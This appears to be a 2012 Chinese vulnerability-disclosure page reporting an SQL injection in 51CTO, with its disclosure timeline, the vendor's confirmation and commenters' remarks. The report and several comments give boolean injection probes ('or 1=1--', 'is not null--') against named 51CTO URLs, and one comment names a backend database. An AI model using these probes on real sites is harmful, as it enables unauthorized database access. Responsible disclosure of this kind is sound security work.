漏洞概要
关注数(24)
关注此漏洞
漏洞标题:51CTO猪肉点
提交时间:2012-07-19 20:44
修复时间:2012-09-02 20:44
公开时间:2012-09-02 20:44
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2012-07-19: 细节已通知厂商并且等待厂商处理中
2012-07-20: 厂商已经确认,细节仅向厂商公开
2012-07-30: 细节向核心白帽子及相关领域专家公开
2012-08-09: 细节向普通白帽子公开
2012-08-19: 细节向实习白帽子公开
2012-09-02: 细节向公众公开
简要描述:
is not null-- is null--
or 1=1-- or 1=2--
详细说明:
http://www.51cto.com/php/artcomment.php?artid=325577
is not null-- is null--
or 1=1-- or 1=2--
漏洞证明:
修复方案:
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2012-07-20 10:22
厂商回复:
感谢提供,马上处理。
最新状态:
暂无
漏洞评价:
评论
-
2012-07-19 20:52 |
_Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)
http://xxxxx.51cto.com/index.php?category=3%20or%201=2--http://xxxxx.51cto.com/index.php?category=3%20or%201=1--是这里
-
2012-07-19 20:56 |
imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )
-
2012-07-19 21:05 |
风萧萧 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)
-
2012-07-19 21:14 |
livers ( 实习白帽子 | Rank:94 漏洞数:6 | mov esp,0jmp espcrash.....)
-
2012-07-19 21:15 |
_Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)
-
2012-07-20 09:06 |
possible ( 普通白帽子 | Rank:373 漏洞数:32 | everything is possible!)
@_Evil 51cto是不是那个下载需要 注册还有什么币的?
-
2012-07-20 09:42 |
Jesus ( 实习白帽子 | Rank:60 漏洞数:18 | 天地不仁,以万物为刍狗!)
51cto的站,曾经暴最高权限注入,其管理员不让提交到wooyun。出于好心直接报给管理员了,2012年以前,防护基本为0一科普类型的网站,没什么价值。
-
2012-07-20 18:12 |
_Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)
@ Jesus = = 2012之前我没去book.51cto.com看过
-
2012-07-20 20:23 |
b4dboy ( 实习白帽子 | Rank:52 漏洞数:3 | good bye)
-
2012-07-27 16:53 |
Jesus ( 实习白帽子 | Rank:60 漏洞数:18 | 天地不仁,以万物为刍狗!)
@_Evil http://selftest.51cto.com/index.php?category=7 DB:n_selftest晴天小鬼,你发的不是不这个?稍候我也发一个!
-
2012-07-27 20:49 |
_Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)
-
2012-07-27 20:49 |
_Evil ( 普通白帽子 | Rank:418 漏洞数:59 | 万事无他,唯手熟尔。农民也会编程,别指望天...)